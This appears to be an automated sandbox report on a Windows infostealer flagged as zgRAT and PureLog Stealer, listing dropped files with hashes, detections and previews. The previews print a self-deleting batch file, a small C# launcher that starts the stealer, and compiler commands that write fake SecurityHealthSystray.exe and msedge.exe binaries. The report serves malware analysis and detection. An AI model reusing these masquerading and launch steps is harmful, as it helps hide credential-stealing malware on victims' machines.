Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.0.cs"

C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.out

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (315), with CRLF, CR line terminators
Category:	modified
Size (bytes):	736
Entropy (8bit):	5.273248779756928
Encrypted:	false
SSDEEP:	12:apI/u7L//TRq79cQDheKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/Vq79tDUKax5DqBVKVrdFAMBJj
MD5:	29BECB4338A339654909F83FD397959B
SHA1:	0CA3E0B80C4D1BFDADAF253E87F85DA24AE159DD
SHA-256:	14B4187CA0922B29316D6D6B2897B90E8082A17AE1EFE83EC72E70CF3C47FD3C
SHA-512:	8CD837530200792481A0C9080E668E9147A923C33C379C71D0EB5726146031A6CB538BDE7F28E160FA92CB275F80165C5C39DBD014E2904F9CEEC64D50125A68
Malicious:	false
Preview:	.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.0.cs

Download File

Process:	C:\Edge\msedge.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	404
Entropy (8bit):	4.991107941089428
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLy4BiFkD:JNVQIbSfhWLzIiFkMSfh+9FkD
MD5:	8FE4593F65A012E6AEC712C9A21AFD05
SHA1:	9C17699A7ABB1915A5334F8BA0A080C5003C4D5D
SHA-256:	FD0F1500FC825DF812F5BC8EA9C04707C36F7C178B6A78ECF8F39A459F7A0C1E
SHA-512:	70D0B192A1220E64587E6C0CB6618EC8ED868D7F63E7379934C4AC93B39606965F34714DA47A41394A68980AAB22486F15AF6F20AC1BD0AB4D9944BDB2F54DFA
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\WmiPrvSE.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	5.112613765972802
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oCHhJ23f5GAn:Hu7L//TRRzscQDcA
MD5:	B90FCF62254E1A1BB99DCE93A83912E7
SHA1:	9AD1A03B7625A11526FBD863A602BC6524F657A7
SHA-256:	98F6681CF54469A177680726B8890664E5A7B7361283EE4469565FF172275F69
SHA-512:	375C06D7741BB83F53FCA4D102A87B8901DFD6E5C9AB21355B958672E8DF820B3A1DD5D4B217B83B2CC6BE9737601D29671602E87CA3DCC9AFC5CC65713205B2
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.0.cs"

C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.out

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (330), with CRLF, CR line terminators
Category:	modified
Size (bytes):	751
Entropy (8bit):	5.249906825801337
Encrypted:	false
SSDEEP:	12:apI/u7L//TRRzscQDc1KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/VRzstDOKax5DqBVKVrdFAMBJj
MD5:	E434632CBFA9E5704944349B40D8369F
SHA1:	2EA5E08005FB772DCC65D14559B16EA98D57CA7D
SHA-256:	3BD741126909776E95CA863BDD5420EB5BB11207EFDBB4D578155376E1F29371
SHA-512:	F8146E6175155E164896C469C23AF05EF5DF135AD28F13C5D0899F00EE9AFD95F394960FA42BEBAC52AEDD9E1FABF8346D8752A7CF67559ABFBE932A42CC6687
Malicious:	false
Preview:	.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat

Download File

Process:	C:\Edge\msedge.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	147
Entropy (8bit):	5.117031081547063
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mF5XIvBktKcKZG1CHyg4E2J5xAIESdzK:hCRLuVFOOr+DE74vKOZG1CHhJ23flJK
MD5:	41ACE4647E5B3D7E06F691561CBC742E
SHA1:	2C86A9A3B2B83025D0E8EE649984137899329114
SHA-256:	C07ECC7F853655212E4FD0E355F97D55B8D3E5135B437DF43F9F687F3201BD43
SHA-512:	F5D292306652858D461DC4BD1F59CF5C63EE8E81FF9716BBBBF73CBBFB083B0000B62C8F16F8AEAFECD0EE7C1664E3E458B5EF8D538AF4F390D1162F6BE9E477
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Edge\msedge.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\qgs8WdcQ4J.bat"

C:\Users\user\AppData\Local\WmiPrvSE.exe

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1963008
Entropy (8bit):	7.552676792704024
Encrypted:	false
SSDEEP:	24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
MD5:	ABD343DF6FBD7334D617F76F6F050E3C
SHA1:	864A1DA1AF2E7B5049B8E7A93402D2BDED518681
SHA-256:	1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
SHA-512:	56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\WmiPrvSE.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)......8I...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....

C:\Users\user\Desktop\AznuGYbp.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Joe Sandbox View:	Filename: 0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe, Detection: malicious, Browse Filename: e416c0d0e2c49f0d5582d90727781330a012ebe541a60.exe, Detection: malicious, Browse Filename: p3f932IsTO.exe, Detection: malicious, Browse Filename: UpU2O6YQxG.exe, Detection: malicious, Browse Filename: 5WbBcHi91R.exe, Detection: malicious, Browse Filename: 4LU843t3Vt.exe, Detection: malicious, Browse Filename: ggJWCFp2S3.exe, Detection: malicious, Browse Filename: yQrCGtNgsf.exe, Detection: malicious, Browse Filename: qDlkXj5kcZ.exe, Detection: malicious, Browse Filename: C0laqZmkEf.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\ERJdElGX.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\EagcoYZU.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\IlfCUBRc.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KiGKqBgX.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\OJAsYAeC.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\jsWPmlvb.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\mOEXVCEF.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\oYbYVUjG.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rWfFWfLI.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\Speech\kdmapper.exe

Download File

Process:	C:\Windows\System32\curl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2284739
Entropy (8bit):	7.490456730492454
Encrypted:	false
SSDEEP:	24576:2TbBv5rUyXVRCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKY:IBJ1LLvax4Gmhscse1D
MD5:	C85ABE0E8C3C4D4C5044AEF6422B8218
SHA1:	F9A4DACEBF1DD80F54DA8C8AFE1DEDDAC99D381D
SHA-256:	7C388F4215D04EEA63A7D5BD9F3CADE715F285EA72DE0E43192FC9F34BAF7C52
SHA-512:	082F4924C624D9B35DFF185B582278E032D3FF230E48739D796BBA250B0807C498EF1B52F78B864AADB35DB0F65463035110C02B7D92DE4FB0A86902CCAD7CB5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

C:\Windows\Speech\physmeme.exe

Download File

Process:	C:\Windows\System32\curl.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	370176
Entropy (8bit):	7.990824056166435
Encrypted:	true
SSDEEP:	6144:uFEE0IJwfawOmaDOEFI2FSCsPOjygLxkxweCyxORzX7rIh0uUWJZtwCiDMf+egqx:uFElvH+KEFLSvVAL7rqDtAIfiq4
MD5:	D6EDF37D68DA356237AE14270B3C7A1A
SHA1:	37FCDB2A0FB6949E710A7E64E181993FD4CBCB29
SHA-256:	D5F6F3242C601E85EEDFF04CD45947F7890E908E51C57F90521EED59C8088B4B
SHA-512:	01CE470A7D19FB9E139C038FF5DD30B6D85409A87B298AE9D3106B5E2EF8712C0D7FC7E4587886DEE47DB040033B9D2D591A0CAFC0001461A0DC07338F0BAA21
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W.f................................. ........@.. ....................................`.................................l...O...................................4................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......p................................................................9m.[...{....V._A.._..X..[m.'..#Q.......[..+H.<..fZ..\|.....m&......y..;KR....7..S..k.m?.8..ID&.!0%N!\.\..L^...0\.....j\|.M.........M.;..q..UO..!'..%. d.E.u......Q-w.$I...X...0d......f.$\|(.gE.N...3.J..T.?.q..\.yX:..W6...t..d.......(.E..n..K.J050....=I3-.x.p.......&{#.,..Vxb.G\.=$...}.C.fgl..`.I.yZ..?.$.'J)....K..............TV.@,...r..q....+....2<ILOS....n<..o.T.~.d:... ..z.>...._.H...

C:\Windows\System32\CSC90DD46E6AB146EBB2673718B916635.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
